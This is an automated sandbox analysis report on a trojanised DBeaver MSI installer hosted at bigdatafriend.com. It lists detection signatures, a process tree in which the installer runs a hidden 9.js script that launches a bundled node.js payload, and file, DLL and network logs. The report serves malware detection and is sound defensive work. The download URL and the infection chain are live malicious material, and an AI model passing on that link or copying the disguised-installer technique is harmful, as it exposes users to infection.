Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi

Overview

General Information

Sample URL:https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi
Analysis ID:1405592
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Allocates memory in foreign processes
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Launches processes in debugging mode, may be used to hinder debugging
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 2356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2040,i,12894160936135680563,1503628891557903779,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • msiexec.exe (PID: 6588 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Downloads\dbeaver-ce-24.0.0-x86_64-setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4436 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • dbeaver.exe (PID: 1740 cmdline: C:\ProgramData\jvb\dbeaver.exe MD5: D0C20D7B58C6974691BCD70220BB1218)
    • wscript.exe (PID: 1360 cmdline: wscript.exe" "9.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • node.exe (PID: 4376 cmdline: "C:\ProgramData\jvb\node.exe" C:/ProgramData/jvb/node.js MD5: 6522AA9953CC98490D64340DD8CF370A)
        • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3672 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 3788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6192 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 4112 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 5776 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 1588 cmdline: C:\Windows\system32\cmd.exe /d /s /c "vol c:" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
No yara matches

System Summary

barindex
Source: Process startedAuthor: Michael Haag: Data: Command: wscript.exe" "9.js, CommandLine: wscript.exe" "9.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 4436, ParentProcessName: msiexec.exe, ProcessCommandLine: wscript.exe" "9.js, ProcessId: 1360, ProcessName: wscript.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: C:\ProgramData\jvb\dbeaver.exeWindow detected: < &BackI &AgreeCancelUniversal Database Manager Universal Database ManagerLicense AgreementPlease review the license terms before installing DBeaver Community.Press Page Down to see the rest of the agreement. Apache License Version 2.0 January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE REPRODUCTION AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use reproduction and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control are controlled by or are under common control with that entity. For the purposes of this definition "control" means (i) the power direct or indirect to cause the direction or management of such entity whether by contract or otherwise or (ii) ownership of fifty percent (50%) or more of the outstanding shares or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications including but not limited to software source code documentation source and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form including but not limited to compiled object code generated documentation and conversions to other media types. "Work" shall mean the work of authorship whether in Source or Object form made available under the License as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work whether in Source or Object form that is based on (or derived from) the Work and for which the editorial revisions annotations elaborations or other modifications represent as a whole an original work of authorship. For the purposes of this License Derivative Works shall not include works that remain separable from or merely link (or bind by name) to the interfaces of the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition "submitted" means any form of electronic verbal or written communication sent to the Licensor or its
Source: C:\ProgramData\jvb\dbeaver.exeWindow detected: < &BackI &AgreeCancelUniversal Database Manager Universal Database ManagerLicense AgreementPlease review the license terms before installing DBeaver Community.Press Page Down to see the rest of the agreement. Apache License Version 2.0 January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE REPRODUCTION AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use reproduction and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control are controlled by or are under common control with that entity. For the purposes of this definition "control" means (i) the power direct or indirect to cause the direction or management of such entity whether by contract or otherwise or (ii) ownership of fifty percent (50%) or more of the outstanding shares or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications including but not limited to software source code documentation source and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form including but not limited to compiled object code generated documentation and conversions to other media types. "Work" shall mean the work of authorship whether in Source or Object form made available under the License as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work whether in Source or Object form that is based on (or derived from) the Work and for which the editorial revisions annotations elaborations or other modifications represent as a whole an original work of authorship. For the purposes of this License Derivative Works shall not include works that remain separable from or merely link (or bind by name) to the interfaces of the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition "submitted" means any form of electronic verbal or written communication sent to the Licensor or its
Source: C:\ProgramData\jvb\dbeaver.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DBeaver
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\readme.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\org.jkiss.bundle.jfreechart_1.0.23\JFREECHART-LICENSE-LGPL.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\commons_license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\dbeaver_license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\gis-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\jsch-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\jsql-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\openai-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\poi-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\licenses\sshj-license.txt
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\jre\conf\security\policy\README.txt
Source: C:\Windows\System32\msiexec.exeFile opened: z:
Source: C:\Windows\System32\msiexec.exeFile opened: x:
Source: C:\Windows\System32\msiexec.exeFile opened: v:
Source: C:\Windows\System32\msiexec.exeFile opened: t:
Source: C:\Windows\System32\msiexec.exeFile opened: r:
Source: C:\Windows\System32\msiexec.exeFile opened: p:
Source: C:\Windows\System32\msiexec.exeFile opened: n:
Source: C:\Windows\System32\msiexec.exeFile opened: l:
Source: C:\Windows\System32\msiexec.exeFile opened: j:
Source: C:\Windows\System32\msiexec.exeFile opened: h:
Source: C:\Windows\System32\msiexec.exeFile opened: f:
Source: C:\Windows\System32\msiexec.exeFile opened: b:
Source: C:\Windows\System32\msiexec.exeFile opened: y:
Source: C:\Windows\System32\msiexec.exeFile opened: w:
Source: C:\Windows\System32\msiexec.exeFile opened: u:
Source: C:\Windows\System32\msiexec.exeFile opened: s:
Source: C:\Windows\System32\msiexec.exeFile opened: q:
Source: C:\Windows\System32\msiexec.exeFile opened: o:
Source: C:\Windows\System32\msiexec.exeFile opened: m:
Source: C:\Windows\System32\msiexec.exeFile opened: k:
Source: C:\Windows\System32\msiexec.exeFile opened: i:
Source: C:\Windows\System32\msiexec.exeFile opened: g:
Source: C:\Windows\System32\msiexec.exeFile opened: e:
Source: C:\Windows\System32\wscript.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\jvb\dbeaver.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: chrome.exeMemory has grown: Private usage: 1MB later: 32MB
Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: bigdatafriend.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.filetransfer.ssl.feature_1.1.402.v20231021-2127\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.app.base.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.db.feature_1.0.117.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.emf.ecore_2.36.0.v20231002-1156\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\org.eclipse.ui.themes_1.2.2300.v20230807-1354\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.2.800.v20231003-1442\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.rcp_4.30.0.v20231201-0512\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.filetransfer.feature_3.14.1900.v20230715-1945\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.emf.common_2.30.0.v20230916-0637\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.standalone.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.filetransfer.httpclientjava.feature_2.0.200.v20231114-1017\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.ce.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.app.local.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.ui.extra.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.core.ssl.feature_1.1.501.v20230507-1921\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.filetransfer.httpclient5.feature_1.1.702.v20231114-1017\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.equinox.p2.discovery.feature_1.3.200.v20231104-1339\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.equinox.p2.extras.feature_1.4.2200.v20231112-1314\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.rcp.feature_3.0.5.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.runtime.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.equinox.p2.core.feature_1.7.0.v20231112-1314\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.e4.rcp_4.30.0.v20231113-1355\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.eclipse.ecf.core.feature_1.6.2.v20231021-2127\META-INF\ECLIPSE_.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.ui.feature_24.0.0.202403031740\META-INF\DBEAVER.RSAJump to dropped file
Source: C:\ProgramData\jvb\dbeaver.exeFile created: C:\Users\user\AppData\Local\DBeaver\features\org.jkiss.dbeaver.db.ui.feature_1.0.117.202403031740\META-INF\DBEAVER.RSAJump to dropped file

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46a97a.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{575F8743-E380-426E-B41E-B72C0697E25F}
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF34.tmp
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46a97c.msi
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\46a97c.msi
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\46a97c.msi
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: secur32.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: sspicli.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: textinputframework.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: coreuicomponents.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: coremessaging.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: wintypes.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: wintypes.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: wintypes.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: textshaping.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: riched20.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: usp10.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: msls31.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: linkinfo.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: ntshrui.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: srvcli.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: cscapi.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: dbghelp.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: iphlpapi.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: userenv.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: winmm.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: cryptbase.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: powrprof.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: umpdc.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: uxtheme.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: mswsock.dll
Source: C:\ProgramData\jvb\node.exeSection loaded: kernel.appcore.dll
Source: C:\ProgramData\jvb\dbeaver.exeSection loaded: netutils.dll
Source: classification engineClassification label: mal52.win@41/900@4/54
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\94eabe3e-5d83-4291-8147-491704571252.tmp
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF6BA3A4EFA9875FEC.TMP
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
